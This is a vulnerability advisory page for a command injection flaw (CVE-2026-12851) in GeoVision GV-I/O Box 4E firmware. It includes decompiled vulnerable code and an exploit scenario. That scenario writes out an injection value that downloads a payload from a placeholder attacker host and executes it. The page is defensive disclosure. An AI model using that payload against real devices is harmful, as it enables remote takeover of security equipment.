Skip to main content

GeoVision GV-I/O Box 4E CVE-2026-12851

| EUVDEUVD-2026-38653 CRITICAL
OS Command Injection (CWE-78)
2026-06-24 GV GHSA-fx96-c5xr-q273
9.1
CVSS 3.1 · Vendor: GV
Share

Severity by source

Vendor (GV) PRIMARY
9.1 CRITICAL
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
vuln.today AI
9.1 CRITICAL

Network-reachable endpoint, no user interaction, but DNS-set path requires admin role so PR:H; system() as device daemon yields full CIA and scope change to OS.

3.1 AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Primary rating from Vendor (GV).

CVSS VectorVendor: GV

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

1
Analysis Generated
Jun 24, 2026 - 05:30 vuln.today

DescriptionCVE.org

Multiple OS command injection vulnerabilities exist in the libNetSetObj.so functionality of GeoVision GV-I/O Box 4E 2.09. A specially crafted network packet can lead to command execution. An attacker can send a network request to trigger this vulnerability.

libNetSetObj.so is an internal library used by various binaries on the device to configure the network stack (start and stop various services, configure IP, Netmask, gateway, dns, etc.)

CNetSetObj::m_F_n_Set_DNS_Addr command injection

The following function can take up to two addresses, performs no sanitization and then calls system. This is a classic command injection vulnerability. The function is reachable from both the network-exposed DVRSearch service and the Network.cgi endpoint.

int __fastcall CNetSetObj::m_F_n_Set_DNS_Addr(CNetSetObj *this, char *dns1, char *dns2)

{

int result; // r0

char v5[80]; // [sp+0h] [bp-50h] BYREF

if ( !dns1 )

result = 0;

if ( dns1 )

{

sprintf(v5, "/bin/echo nameserver %s > /etc/resolv.conf", dns1); // attacker controlled dns1 field

system(v5);

if ( dns2 )

{

sprintf(v5, "/bin/echo nameserver %s >> /etc/resolv.conf", dns2);

system(v5);

}

return 1;

}

return result;

AnalysisAI

Remote OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows attackers with high privileges to execute arbitrary shell commands by sending crafted network packets to the DVRSearch service or Network.cgi endpoint. The flaw lives in libNetSetObj.so where DNS configuration values are concatenated into a shell command string and passed to system() without sanitization. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Reach device management network
Delivery
Authenticate to GV-I/O Box 4E admin interface
Exploit
Send crafted DNS field to DVRSearch or Network.cgi
Execution
Shell metacharacters reach system() in libNetSetObj.so
Persist
Arbitrary command executes as service daemon
Impact
Pivot into camera/DVR network

Vulnerability AssessmentAI

Exploitation Attacker must be able to reach the GV-I/O Box 4E over the network on either the DVRSearch service or the Network.cgi HTTP endpoint and supply a DNS1 (and optionally DNS2) value that flows into CNetSetObj::m_F_n_Set_DNS_Addr. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 base score of 9.1 reflects network reach with low attack complexity, scope change, and high CIA impact, but it is tempered by PR:H - exploitation as scored requires high-privilege access to the device. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who has reached the management network of a GV-I/O Box 4E (for example via a flat camera VLAN or compromised installer credentials) sends a crafted request to the DVRSearch service or POSTs to Network.cgi setting the DNS1 field to a value such as 1.1.1.1;wget http://attacker/x -O /tmp/x;sh /tmp/x. The libNetSetObj.so handler concatenates the field into a shell command and invokes system(), executing the attacker's payload with the daemon's privileges and giving footholds for persistence, lateral pivot into the camera/DVR network, or relay-output manipulation. …
Remediation Patch availability is not explicitly stated in the supplied data, so treat this as patch available per vendor advisory and consult https://www.geovision.com.tw/cyber_security.php for the firmware release that supersedes 2.09, applying it to all GV-I/O Box 4E units. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Inventory all GeoVision GV-I/O Box 4E devices running firmware 2.09; immediately restrict administrative account creation and require multi-factor authentication for all administrative access. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-12851 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy